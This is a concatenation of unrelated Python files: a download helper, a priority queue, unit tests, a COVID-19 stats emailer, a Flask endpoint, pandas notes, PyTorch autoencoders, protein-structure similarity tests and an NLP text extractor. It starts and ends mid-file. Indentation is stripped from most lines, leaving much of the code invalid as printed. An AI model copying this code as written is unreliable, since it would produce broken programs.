with tqdm(total=file_size, unit='B',
unit_scale=True, unit_divisor=1024,
desc=file_name, initial=initial_pos,
ascii=True, miniters=1) as pbar:
for chunk in r.iter_content(32 * 1024):
f.write(chunk)
pbar.update(len(chunk))
except Exception as e:
logging.info(url)
logging.error(f"[!] Error while downloading: '{e}'")
            if os.path.exists(output_path):
                os.remove(output_path)
else:
        logging.info(f'[!!] Error while downloading ==> Not a valid URL')
|
# NaivePriorityQueue (aka 'ShittyQueue'): A simple but inefficient priority queue.
# Your implementation should pass the tests in test_naive_priority_queue.py.
# Andras Mihaly
class NaivePriorityQueue:
def __init__(self):
self.data = []
def enqueue(self, value):
self.data.append(value)
    def dequeue(self):
        # return the highest-priority item; a linear scan keeps this simple but O(n)
        if not self.data:
            return None
        highest = self.data[0]
        for term in self.data:
            if term.priority > highest.priority:
                highest = term
        return self.data.pop(self.data.index(highest))
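# Minimal usage sketch (assumes queued items expose a `priority` attribute; the Task namedtuple
# below is illustrative, not part of the real test suite):
#
#   from collections import namedtuple
#   Task = namedtuple('Task', ['name', 'priority'])
#   q = NaivePriorityQueue()
#   q.enqueue(Task('low', 1))
#   q.enqueue(Task('high', 9))
#   assert q.dequeue().name == 'high'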
|
import pytest

def adder(lhs, rhs):
return lhs + rhs
def suber(lhs, rhs):
return lhs - rhs
def test_adder_simple_add():
assert adder(9, 10) == 19
def test_adder_floats():
    # floating-point addition is inexact, so compare with a tolerance
    assert adder(1.1, 2.3) == pytest.approx(3.4)
def test_suber_simple():
assert suber(10, 7) == 3
|
import urllib.request
from flask import Flask, request,jsonify
import json
import matplotlib.pyplot as plt
import numpy
import os
import smtplib
global con
global rec
global act
global dec
global ip2
global ip1
global total
global red_zone
EMAIL_ID = os.environ.get('DB_USER')
EMAIL_PASS = os.environ.get('DB_PASS')
RECEIVER = input("Enter your E-mail ID:\n")
def getResponse(url):
    openUrl = urllib.request.urlopen(url)
    if openUrl.getcode() == 200:
        data = openUrl.read()
        jsonData = json.loads(data)
    else:
        print("Error receiving data", openUrl.getcode())
        jsonData = None
    return jsonData
def main():
total = 0
y_ax = []
x_ax = []
y = {}
urlData = "https://api.covid19india.org/v2/state_district_wise.json"
jsonData = getResponse(urlData)
ip1 = input("Enter your state: ")
ip2 = input("Enter your district: ")
for i in jsonData:
x = i["state"]
if x == ip1 :
y[x] = i["districtData"]
for t in y[x]:
k = t["district"]
if k == ip2 :
con = t["confirmed"]
rec = t["recovered"]
act = t["active"]
dec = t["deceased"]
print("Confirmed Patients : ",con)
print("Recovered Patients : ",rec)
print("Active Patients : ",act)
print("Deceased Patients : ",dec)
    for i in jsonData:
        x = i["state"]
        y[x] = i["districtData"]
        for t in y[x]:
            # accumulate into total without overwriting the district-level `con` reported above
            total = total + t["confirmed"]
with smtplib.SMTP_SSL('smtp.gmail.com',465) as smtp:
smtp.login(EMAIL_ID,EMAIL_PASS)
subject = 'COVID-19 STATS UPDATE'
data_string1 = f'Dear user!\n' \
f'We hope you\'re staying safe and staying home.\n' \
f'Currently, more than 3 million people are affected worldwide and {total} people are affected in India.\n' \
f'Here are the stats for {ip2},{ip1} -\n' \
f'Confirmed Patients : {con}\n' \
f'Recovered Patients : {rec}\n' \
f'Active Patients : {act}\n' \
f'Deceased Patients : {dec}\n' \
                      f'Your area is in Red Zone!'
data_string = f'Dear user!\n' \
f'We hope you\'re staying safe and staying home.\n' \
f' Currently, more than 3 million people are affected worldwide and {total} people are affected in India.\n' \
f'Here are the stats for {ip2},{ip1} -\n' \
f'Confirmed Patients : {con}\n' \
f'Recovered Patients : {rec}\n' \
f'Active Patients : {act}\n' \
f'Deceased Patients : {dec}\n' \
                      f'Your area is not in Red Zone!'
if act >= 15:
body = data_string1
else:
body = data_string
msg = f'Subject: {subject}\n\n{body}'
smtp.sendmail(EMAIL_ID, RECEIVER, msg)
if __name__ == '__main__':
main()
|
from flask_restful import Resource
from flask import request
from auth.manager import update_role
from decorators import admin_required
from exception import MyException
class RoleUpdate(Resource):
@classmethod
@admin_required
def patch(cls):
data = request.get_json()
if not data:
raise MyException('fields cannot be empty', status_code=400)
return update_role(data['username'], data['role'])
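# Request sketch (the URL depends on how RoleUpdate is registered with the Api object, so the
# path below is an assumption):
#   PATCH /roles  with JSON body {"username": "jdoe", "role": "admin"}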
|
# Filename : instead_enter.py
# Author by : Lily
# Type 'quit' on its own line (instead of just pressing Enter) to finish and save the file
def file_write(file_name):
    f = open(file_name, 'w', encoding='utf-8')
    print("Enter the content (type 'quit' on a line by itself to save and exit):")
    while True:
        file_content = input()
        if file_content != 'quit':
            f.write('%s\n' % file_content)
        else:
            break
    f.close()
my_file_name = input('Enter the file name: ')
file_write(my_file_name)
|
# Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
class TermNotStarted(Exception):
pass
|
import unittest
from unittest import TestCase
from plot import *
from date import *
from test_grades import *
import pandas as pd
# author: Kaiwen Liu
# this is a test for assignment 10
class test(unittest.TestCase):
def setUp(self):
pass
# test if the test_grades function returns the correct value
def test_grades_test(self):
self.assertEqual(test_grades(['C','C']), 0)
self.assertEqual(test_grades(['A','C']), -1)
self.assertEqual(test_grades(['C','A']), 1)
    def test_plot_columns(self): # test that the merged dataframe has 4 columns
self.assertTrue(len(self.df_date_and_grade.columns) == 4)
    def test_plot_correct_columns(self): # test if the dataframe has the correct columns
        self.assertEqual(list(self.df_date_and_grade.columns), ['Date','A','B','C'])
if __name__ == '__main__':
unittest.main()
|
from django.apps import AppConfig
class RoomConfig(AppConfig):
name = 'room'
    verbose_name = 'Interview room & interview schedule management'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 16 11:32:28 2020
@author: adeela
"""
'''
https://pandas.pydata.org/pandas-docs/stable/getting_started/10min.html#min
'''
import numpy as np
import pandas as pd
s = pd.Series(['1', 1, np.nan, 1])
s
# gives 6 dates starting from 2020-01-01
dates = pd.date_range('2020-01-01', periods=6)
# returns list as ['A', 'B', 'C', 'D']
list('ABCD')
# returns a 6x4 array of standard-normal random values
np.random.randn(6,4)
df = pd.DataFrame(np.random.randn(6,4),
index = dates,
columns=list('1234'))
## dataframe from a dictionary object
df2 = pd.DataFrame({
'A': 1,
'B': pd.Timestamp('20200101'),
'C': pd.Categorical(['yes', 'no', 'yes', 'no']),
'D': np.array([3] * 4),
'E': pd.Series(1, index=range(4))
})
df2.dtypes # types of columns in dataframe
df2.A # can access the whole column
# to see the index of the dataframe
df2.index
df.index
#25%, 50%, 75% are q1, q2, q3 respectively
df.describe()
#transpose of data frame
df.T
# axis=0 sorts by the row index (the dates); axis=1 sorts by the column labels
df.sort_index(axis=0, ascending= True)
df.sort_index(axis=1, ascending= True)
#sort by values of column labeled '2'
df.sort_values(by = '2')
# =============================================================================
# SELECTION
# =============================================================================
#selecting a single column gives you back a series
df['1']
# to get rows by slicing syntax
# return rows 0 and 1
df [0:2]
#returns row where index value matches
df['2020-01-01': '2020-01-03']
#df['2020-01-01'] doesn't work
#getting data by the index value
df.loc['2020-01-01']
#select all rows for column named '1'
df.loc[:, '1']
#select all rows for column 1 and 2
df.loc[:, ['1', '2']]
# get the values of columns '1' and '2' for the row whose index is '2020-01-01'
df.loc['2020-01-01', ['1','2']]
# get the value of column '1' for the row whose index is '2020-01-01'
df.loc['2020-01-01', ['1']]
# =============================================================================
# Selection by POSITION
# =============================================================================
# return the fourth row all columns
df.iloc[3]
#get values for the 3rd to 5th rows and the 2nd column (index 1)
df.iloc[2:5, 1]
#get values for 3 to 5th row and 2nd and 3rd column
df.iloc[2:5, 1:3]
#return 4th row all columns
df.iloc[3, :]
# value at row i and column j
df.iloc[1,1]
# =============================================================================
# Bolean Indexing
# =============================================================================
#data where values of column '1' > 0
df[df['1']> 0 ]
#Adding a column
df['5'] = ['a', 'b', 'c', 'd', 'e', 'f']
# check whether a column contains a certain value, i.e.
# extract the rows where column '5' has the value 'a'
df[df['5'].isin(['a'])]
## update rows where column '5' contains a, b or c
## Problem: this boolean-indexed assignment overwrites every column of the matching rows
# to change only column '5', use .loc with an explicit column label (see the sketch below)
df[df['5'].isin(list('abc'))] = 'g'
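# sketch: pair the boolean mask with the target column label so only column '5' is rewritten
# (left commented out because the assignment above has already replaced these rows):
# df.loc[df['5'].isin(list('abc')), '5'] = 'g'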
# =============================================================================
# APPLY function
# =============================================================================
## note: Series.apply(np.sum) calls np.sum once per scalar, so it returns the column values unchanged
df['1'].apply(np.sum)
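## to actually total a numeric column, call the reduction directly, e.g. df['1'].sum()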
## sum of all elements in the data
# if it is string , it returns a concatenated result
df.apply(np.sum)
## sum along the column meaning sum of each column
df.apply(np.sum, axis=0)
df.iloc[:, :4] # selects all rows and the first four columns (indices 0 to 3)
# axis=1 --> sum across the columns, one value per row
df.iloc[:, :4].apply(np.sum, axis=1)
# axis=0 --> sum down each column, one value per column
df.iloc[:, :4].apply(np.sum, axis=0)
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class AutoEncoder(nn.Module):
def __init__(self):
super(AutoEncoder, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(3, 8, 5, stride=2, padding=2),
nn.PReLU(),
nn.Conv2d(8, 8, 5, stride=2, padding=2),
nn.PReLU(),
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(8, 8, 6, stride=2, padding=2),
nn.PReLU(),
nn.ConvTranspose2d(8, 3, 6, stride=2, padding=2),
nn.Sigmoid(),
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
class Encoder(nn.Module):
def __init__(self):
super(Encoder, self).__init__()
self.conv1 = nn.Conv2d(3, 12, 4, stride=2, padding=1)
self.conv2 = nn.Conv2d(12, 24, 4, stride=2, padding=1)
self.conv3 = nn.Conv2d(24, 48, 4, stride=2, padding=1)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
return x
class Decoder(nn.Module):
def __init__(self):
super(Decoder, self).__init__()
self.deconv1 = nn.ConvTranspose2d(48, 24, 4, stride=2, padding=1)
self.deconv2 = nn.ConvTranspose2d(24, 12, 4, stride=2, padding=1)
self.deconv3 = nn.ConvTranspose2d(12, 3, 4, stride=2, padding=1)
def forward(self, x):
x = F.relu(self.deconv1(x))
x = F.relu(self.deconv2(x))
x = self.deconv3(x)
x = torch.sigmoid(x)
return x
class Classifier(nn.Module):
def __init__(self):
super(Classifier, self).__init__()
self.fc1 = nn.Linear(48 * 4 * 4, 512)
self.fc2 = nn.Linear(512, 128)
self.fc3 = nn.Linear(128, 10)
def forward(self, x):
x = x.view(-1, 48 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class CAE(nn.Module):
def __init__(self):
super(CAE, self).__init__()
self.encoder = Encoder()
self.decoder = Decoder()
self.classifier = Classifier()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def classify(self, x):
x = self.encoder(x)
x = self.classifier(x)
return x
class Encoder2(nn.Module):
def __init__(self):
super(Encoder2, self).__init__()
self.conv1 = nn.Conv2d(3, 16, 3, stride=1, padding=1)
self.conv2 = nn.Conv2d(16, 8, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(8, 8, 3, stride=1, padding=1)
self.pool1 = nn.MaxPool2d(2, stride=2)
self.pool2 = nn.MaxPool2d(2, stride=2)
self.bn1 = nn.BatchNorm2d(16)
self.bn2 = nn.BatchNorm2d(8)
self.bn3 = nn.BatchNorm2d(8)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
# x = F.elu(x)
x = F.leaky_relu(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.bn2(x)
# x = F.elu(x)
x = F.leaky_relu(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.bn3(x)
# x = F.elu(x)
x = F.leaky_relu(x)
return x
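# Shape sketch for Encoder2 (assuming 3x32x32 CIFAR-style inputs): conv1+pool1 -> 16x16x16,
# conv2+pool2 -> 8x8x8, conv3 -> 8x8x8, i.e. 512 features, matching Classifier2's Linear(512, ...).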
class Decoder2(nn.Module):
def __init__(self):
super(Decoder2, self).__init__()
self.deconv3 = nn.ConvTranspose2d(8, 8, 3, stride=1, padding=1)
self.deconv2 = nn.ConvTranspose2d(8, 16, 3, stride=1, padding=1)
self.deconv1 = nn.ConvTranspose2d(16, 3, 3, stride=1, padding=1)
# self.upsample2 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample2 = nn.Upsample(scale_factor=2)
# self.upsample1 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample1 = nn.Upsample(scale_factor=2)
self.bn3 = nn.BatchNorm2d(8)
self.bn2 = nn.BatchNorm2d(16)
def forward(self, x):
x = self.deconv3(x)
x = self.bn3(x)
# x = F.elu(x)
x = F.leaky_relu(x)
x = self.upsample2(x)
x = self.deconv2(x)
x = self.bn2(x)
# x = F.elu(x)
x = F.leaky_relu(x)
x = self.upsample1(x)
x = self.deconv1(x)
x = torch.sigmoid(x)
return x
class Classifier2(nn.Module):
def __init__(self):
super(Classifier2, self).__init__()
# self.fc1 = nn.Linear(512, 256)
# self.fc2 = nn.Linear(256, 128)
# self.fc3 = nn.Linear(128, 64)
# self.fc4 = nn.Linear(64, 10)
self.fc1 = nn.Linear(512, 128)
self.fc2 = nn.Linear(128, 64)
self.fc3 = nn.Linear(64, 10)
self.dp1 = nn.Dropout(p=0.2)
self.dp2 = nn.Dropout(p=0.2)
self.weights_init()
def forward(self, x):
x = x.view(-1, 512)
x = self.fc1(x)
x = F.elu(x)
x = self.dp1(x)
x = self.fc2(x)
x = F.elu(x)
x = self.dp2(x)
x = self.fc3(x)
# x = F.elu(x)
# x = self.fc4(x)
return x
def weights_init(self):
nn.init.xavier_normal_(self.fc1.weight)
nn.init.xavier_normal_(self.fc2.weight)
nn.init.xavier_normal_(self.fc3.weight)
# nn.init.xavier_normal_(self.fc4.weight)
class CAE2(nn.Module):
def __init__(self):
super(CAE2, self).__init__()
self.encoder = Encoder2()
self.decoder = Decoder2()
self.classifier = Classifier2()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def classify(self, x):
x = self.encoder(x)
x = self.classifier(x)
return x
def save_model(self, path='model_weights'):
torch.save(self.encoder.state_dict(), f'{path}/Encoder')
torch.save(self.decoder.state_dict(), f'{path}/Decoder')
torch.save(self.classifier.state_dict(), f'{path}/Classifier')
class Encoder3(nn.Module):
def __init__(self):
super(Encoder3, self).__init__()
self.conv1 = nn.Conv2d(3, 12, 3, stride=1, padding=1)
self.conv2 = nn.Conv2d(12, 24, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(24, 48, 3, stride=2, padding=1)
# self.pool1 = nn.MaxPool2d(2, stride=2)
# self.pool2 = nn.MaxPool2d(2, stride=2)
self.dp1 = nn.Dropout2d(p=0.1)
self.dp2 = nn.Dropout2d(p=0.1)
self.bn1 = nn.BatchNorm2d(12)
self.bn2 = nn.BatchNorm2d(24)
self.bn3 = nn.BatchNorm2d(48)
def forward(self, img):
x = self.conv1(img)
# x = self.bn1(x)
x = self.dp1(x)
x = F.relu(x)
# x = self.pool1(x)
x = self.conv2(x)
# x = self.bn2(x)
x = self.dp2(x)
x = F.relu(x)
# x = self.pool2(x)
x = self.conv3(x)
# x = self.bn3(x)
x = F.elu(x)
return x
class Decoder3(nn.Module):
def __init__(self):
super(Decoder3, self).__init__()
self.deconv3 = nn.ConvTranspose2d(48, 24, 4, stride=2, padding=1)
self.deconv2 = nn.ConvTranspose2d(24, 12, 3, stride=1, padding=1)
self.deconv1 = nn.ConvTranspose2d(12, 3, 3, stride=1, padding=1)
# self.upsample2 = nn.Upsample(scale_factor=2)
# self.upsample1 = nn.Upsample(scale_factor=2)
self.bn3 = nn.BatchNorm2d(24)
self.bn2 = nn.BatchNorm2d(12)
def forward(self, x):
x = self.deconv3(x)
# x = self.bn3(x)
x = F.relu(x)
# x = self.upsample2(x)
x = self.deconv2(x)
# x = self.bn2(x)
x = F.relu(x)
# x = self.upsample1(x)
x = self.deconv1(x)
x = torch.sigmoid(x)
return x
class Classifier3(nn.Module):
def __init__(self):
super(Classifier3, self).__init__()
self.conv1 = nn.Conv2d(48, 48, 3, padding=1)
self.conv2 = nn.Conv2d(48, 48, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(48, 48, kernel_size=3, stride=1, padding=1)
self.bn1 = nn.BatchNorm2d(48)
self.bn2 = nn.BatchNorm2d(48)
self.pool1 = nn.MaxPool2d(2, stride=2)
self.pool2 = nn.MaxPool2d(2, stride=2)
self.fc1 = nn.Linear(768, 256)
self.fc2 = nn.Linear(256, 64)
self.fc3 = nn.Linear(64, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = self.bn1(self.pool1(x))
x = F.relu(self.conv2(x))
x = self.bn2(self.pool2(x))
x = F.dropout(F.relu(self.conv3(x)), p=0.1)
x = x.view(-1, 48 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class CAE3(nn.Module):
def __init__(self):
super(CAE3, self).__init__()
self.encoder = Encoder3()
self.decoder = Decoder3()
self.classifier = Classifier3()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def classify(self, x):
x = self.encoder(x)
x = self.classifier(x)
return x
def save_model(self, path='model_weights'):
torch.save(self.encoder.state_dict(), f'{path}/Encoder3')
torch.save(self.decoder.state_dict(), f'{path}/Decoder3')
torch.save(self.classifier.state_dict(), f'{path}/Classifier3')
class Encoder4(nn.Module):
def __init__(self):
super(Encoder4, self).__init__()
self.conv1 = nn.Conv2d(1, 16, 3, stride=1, padding=1)
self.conv2 = nn.Conv2d(16, 8, 3, stride=1, padding=1)
self.conv3 = nn.Conv2d(8, 8, 3, stride=1, padding=1)
self.pool1 = nn.MaxPool2d(2, stride=2)
self.pool2 = nn.MaxPool2d(2, stride=2)
self.bn1 = nn.BatchNorm2d(16)
self.bn2 = nn.BatchNorm2d(8)
self.bn3 = nn.BatchNorm2d(8)
def forward(self, img):
x = self.conv1(img)
x = self.bn1(x)
x = F.elu(x)
x = self.pool1(x)
x = self.conv2(x)
x = self.bn2(x)
x = F.elu(x)
x = self.pool2(x)
x = self.conv3(x)
x = self.bn3(x)
x = F.elu(x)
return x
class Decoder4(nn.Module):
def __init__(self):
super(Decoder4, self).__init__()
self.deconv3 = nn.ConvTranspose2d(8, 8, 3, stride=1, padding=1)
self.deconv2 = nn.ConvTranspose2d(8, 16, 3, stride=1, padding=1)
self.deconv1 = nn.ConvTranspose2d(16, 1, 3, stride=1, padding=1)
self.upsample2 = nn.Upsample(scale_factor=2)
self.upsample1 = nn.Upsample(scale_factor=2)
self.bn3 = nn.BatchNorm2d(8)
self.bn2 = nn.BatchNorm2d(16)
def forward(self, x):
x = self.deconv3(x)
x = self.bn3(x)
x = F.elu(x)
x = self.upsample2(x)
x = self.deconv2(x)
x = self.bn2(x)
x = F.elu(x)
x = self.upsample1(x)
x = self.deconv1(x)
x = torch.sigmoid(x)
return x
class Classifier4(nn.Module):
def __init__(self):
super(Classifier4, self).__init__()
self.fc1 = nn.Linear(512, 256)
self.fc2 = nn.Linear(256, 128)
self.fc3 = nn.Linear(128, 10)
def forward(self, x):
x = x.view(-1, 512)
x = self.fc1(x)
x = F.elu(x)
x = self.fc2(x)
x = F.elu(x)
x = self.fc3(x)
return x
class CAE4(nn.Module):
def __init__(self):
super(CAE4, self).__init__()
self.encoder = Encoder4()
self.decoder = Decoder4()
self.classifier = Classifier4()
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def classify(self, x):
x = self.encoder(x)
x = self.classifier(x)
return x
class Combine(nn.Module):
def __init__(self):
super(Combine, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(3, 8, 5, stride=2, padding=2),
nn.PReLU(),
nn.Conv2d(8, 8, 5, stride=2, padding=2),
nn.PReLU(),
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(8, 8, 6, stride=2, padding=2),
nn.PReLU(),
nn.ConvTranspose2d(8, 3, 6, stride=2, padding=2),
nn.Sigmoid(),
)
self.classifier = nn.Sequential(
nn.Linear(8 * 8 * 8, 126),
nn.ReLU(),
nn.Linear(126, 64),
nn.ReLU(),
nn.Linear(64, 10),
)
def forward(self, x):
encoded = self.encoder(x)
decoded = self.decoder(encoded)
predicted = self.classifier(encoded.view(-1, 8 * 8 * 8))
return decoded, predicted
def autoencode(self, x):
encoded = self.encoder(x)
return self.decoder(encoded)
def predict(self, x):
encoded = self.encoder(x)
return self.classifier(encoded.view(-1, 8 * 8 * 8))
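# Note: the 8 * 8 * 8 flattening above assumes 32x32 inputs; the two stride-2 convolutions in the
# encoder halve each spatial dimension twice (32 -> 16 -> 8).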
"""
ae = AutoEncoder()
ae.encoder.load_state_dict(torch.load('model_weights/auto_encoder'))
"""
if __name__ == '__main__':
ae = AutoEncoder()
ae.encoder.load_state_dict(torch.load('model_weights/auto_encoder'))
print(ae)
|
import os
from pathlib import Path
from pdb2sql.StructureSimilarity import StructureSimilarity
import unittest
from . import pdb_folder
class TestSim(unittest.TestCase):
"""Test Similarity calculation."""
def setUp(self):
self.decoy = Path(pdb_folder, '1AK4', '1AK4_5w.pdb')
self.ref = Path(pdb_folder, '1AK4', 'target.pdb')
self.izone = Path(pdb_folder, '1AK4', 'target.izone')
self.lzone = Path(pdb_folder, '1AK4', 'target.lzone')
self.sim = StructureSimilarity(self.decoy, self.ref, enforce_residue_matching=False)
        # target values are calculated using scripts from
# https://github.com/haddocking/BM5-clean
self.irmsd = 1.135
self.lrmsd = 6.655
self.fnat = 0.790698
self.dockQ = 0.682191
self.capriClass = 'medium'
self.nclashes_ref = 4
####################################################################
# test check_residues to see if pdb files match or not
####################################################################
def test_check_residues(self):
decoy = Path(pdb_folder, '1AK4', '1AK4_5w_nonmatch.pdb')
with self.assertRaisesRegex(ValueError,
'Residue numbering not identical'):
sim = StructureSimilarity(decoy, self.ref)
sim.check_residues()
####################################################################
# test i-rmsd
####################################################################
def test_irmsdfast_default(self):
"""verify compute_irmsd_fast()"""
result = self.sim.compute_irmsd_fast()
self.assertEqual(result, self.irmsd)
def test_irmsdfast_izone(self):
"""verify compute_irmsd_fast(izone='fast.izone)"""
result = self.sim.compute_irmsd_fast(izone=self.izone)
self.assertEqual(result, self.irmsd)
def test_irmsdfast_method(self):
"""verify compute_irmsd_fast(method='quaternion')"""
result = self.sim.compute_irmsd_fast(method='quaternion')
self.assertEqual(result, self.irmsd)
def test_irmsdfast_check(self):
"""verify compute_irmsd_fast(check=False)"""
result = self.sim.compute_irmsd_fast(check=False)
self.assertEqual(result, self.irmsd)
def test_irmsdsql_default(self):
"""verify compute_irmsd_pdb2sql()"""
result = self.sim.compute_irmsd_pdb2sql()
self.assertEqual(result, self.irmsd)
def test_irmsdsql_izone(self):
"""verify compute_irmsd_pdb2sql(izone='sql.izone)"""
result = self.sim.compute_irmsd_pdb2sql(izone=self.izone)
self.assertEqual(result, self.irmsd)
def test_irmssql_method(self):
"""verify compute_irmsd_pdb2sql(method='quaternion')"""
result = self.sim.compute_irmsd_pdb2sql(method='quaternion')
self.assertEqual(result, self.irmsd)
def test_irmsdsql_exportpdb(self):
"""verify compute_irmsd_pdb2sql(exportpath='.')"""
result = self.sim.compute_irmsd_pdb2sql(exportpath='.')
self.assertEqual(result, self.irmsd)
self.assertTrue(os.path.isfile('./irmsd_ref.pdb'))
self.assertTrue(os.path.isfile('./irmsd_decoy.pdb'))
self.assertTrue(os.path.getsize('./irmsd_ref.pdb') > 0)
self.assertTrue(os.path.getsize('./irmsd_decoy.pdb') > 0)
os.remove('./irmsd_ref.pdb')
os.remove('./irmsd_decoy.pdb')
####################################################################
# test l-rmsd
####################################################################
def test_lrmsdfast_default(self):
"""verify compute_lrmsd_fast()"""
result = self.sim.compute_lrmsd_fast()
self.assertEqual(result, self.lrmsd)
def test_lrmsdfast_lzone(self):
"""verify compute_lrmsd_fast(lzone='fast.lzone)"""
result = self.sim.compute_lrmsd_fast(lzone=self.lzone)
self.assertEqual(result, self.lrmsd)
def test_lrmsdfast_method(self):
"""verify compute_lrmsd_fast(method='quaternion')"""
result = self.sim.compute_lrmsd_fast(method='quaternion')
self.assertEqual(result, self.lrmsd)
def test_lrmsdsql_default(self):
"""verify compute_lrmsd_pdb2sql()"""
result = self.sim.compute_lrmsd_pdb2sql()
self.assertEqual(result, self.lrmsd)
def test_lrmsdsql_method(self):
"""verify compute_lrmsd_pdb2sql(method='quaternion')"""
result = self.sim.compute_lrmsd_pdb2sql(method='quaternion')
self.assertEqual(result, self.lrmsd)
def test_lrmsdsql_exportpdb(self):
"""verify compute_lrmsd_pdb2sql(exportpath='.')"""
result = self.sim.compute_lrmsd_pdb2sql(exportpath='.')
self.assertEqual(result, self.lrmsd)
self.assertTrue(os.path.isfile('./lrmsd_ref.pdb'))
self.assertTrue(os.path.isfile('./lrmsd_decoy.pdb'))
self.assertTrue(os.path.getsize('./lrmsd_ref.pdb') > 0)
self.assertTrue(os.path.getsize('./lrmsd_decoy.pdb') > 0)
os.remove('./lrmsd_ref.pdb')
os.remove('./lrmsd_decoy.pdb')
####################################################################
# test FNAT
####################################################################
def test_fnatfast_default(self):
"""verify compute_fnat_fast()"""
result = self.sim.compute_fnat_fast()
self.assertEqual(result, self.fnat)
def test_fnatsql_default(self):
"""verify compute_fnat_pdb2sql()"""
result = self.sim.compute_fnat_pdb2sql()
self.assertEqual(result, self.fnat)
####################################################################
# test dockQ
####################################################################
def test_dockQ_default(self):
"""verify compute_DockQScore()"""
result = self.sim.compute_DockQScore(self.fnat, self.lrmsd, self.irmsd)
self.assertEqual(result, self.dockQ)
####################################################################
# test CAPRI
####################################################################
def test_capri_default(self):
"""verify compute_CapriClass()"""
result = self.sim.compute_CapriClass(self.fnat, self.lrmsd, self.irmsd)
self.assertEqual(result, self.capriClass)
def test_capri_dummy(self):
"""verify compute_CapriClass()"""
fnat = [0.9, 0.8, 0.7, 0.5, 0.3, 0.1]
lrmsd = [0.8, 2.4, 6.2, 7.5, 12.0, 10.0]
irmsd = [0.6, 0.8, 1.6, 2.3, 3.1, 3.3]
targets = ['high', 'high', 'medium',
'acceptable', 'acceptable', 'acceptable']
results = []
for i, j, k in zip(fnat, lrmsd, irmsd):
results.append(self.sim.compute_CapriClass(i, j, k))
self.assertEqual(results, targets)
####################################################################
# test clashes
####################################################################
def test_clashes_default(self):
"""verify compute_clashes()"""
result = self.sim.compute_clashes(self.ref)
self.assertEqual(result, self.nclashes_ref)
if __name__ == '__main__':
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
# read numeric values (input() returns strings, which would break the arithmetic below)
pay = float(input('Enter your pay:'))
dependants = int(input('How many people do you need to insure?'))
def calc_taxes(pay):
    return pay * .07
def calc_insurance(dependants):
    return dependants * 30
def calc_401k(pay):
    return pay * .05
def calc_net(pay, dependants):
    taxes = calc_taxes(pay)
    insurance = calc_insurance(dependants)
    retirement = calc_401k(pay)
    return pay - taxes - insurance - retirement
print(calc_net(pay, dependants))
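# e.g. calc_net(1000, 2) -> 1000 - 70 (taxes) - 60 (insurance) - 50 (401k) = 820.0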
|
import re
from os import name
import flair
from flair.data import Sentence
from flair.models import MultiTagger
from flair.models import SequenceTagger
from flair.tokenization import SegtokSentenceSplitter
import string
from word2number import w2n
# load the NER tagger
tagger = MultiTagger.load(['pos','ner'])
compass = []
with open('./dictionaries/compass.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha() or char == '.' or char == ',':
word += char
if len(word):
compass.append(word)
colours = []
with open('./dictionaries/colours.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
colours.append(word)
# This function will extract information about singular boulder paragraphs (ie. a numbered paragraph that refers to a single boulder), returns the attributes found within the paragraph
def find_boulder_from_paragraph(match,number):
paragraph = ""
for word in match.text:
paragraph += word + " "
# initialize sentence splitter
splitter = SegtokSentenceSplitter()
# use splitter to split text into list of sentences
sentences = splitter.split(paragraph)
size = None
location = None
rocktype = None
author = None
dims = None
numberofboulders = None
extra = None
weight = None
volume = None
distance = None
hasl = None
sentence_length = 0
rt_dict = {}
siz_pos = {}
aut_dict = {}
loc_dict = {}
dim_dict = {}
extra_dict = {}
comp_dict = {}
numbox = None
for flair_sentence in sentences:
# predict NER and POS tags
tagger.predict(flair_sentence)
if ("Boulders" in flair_sentence.to_original_text() or "boulders" in flair_sentence.to_original_text() or "Block" in flair_sentence.to_original_text() or "block" in flair_sentence.to_original_text()) and numberofboulders is None:
numberstring, numberofboulders = find_number(flair_sentence)
if numberstring:
for j, word in match.iterrows():
if numberstring in word['text']:
numbox = (word['left'], word['top'], word['width'], word['height'])
# Run find size to search the sentence for the size of the boulder of form L x B x H
can_siz_pos, can_size = find_size(flair_sentence,flair_sentence.to_original_text())
if can_size:
if size:
size += ' - ' + can_size
else:
size = can_size
# Get position of the size related features in the whole paragraph, This uses a different method to other features as the fractions
# used throughout report aren't picked up by the OCR which messes things up a bit.
if can_siz_pos:
for siz in can_siz_pos:
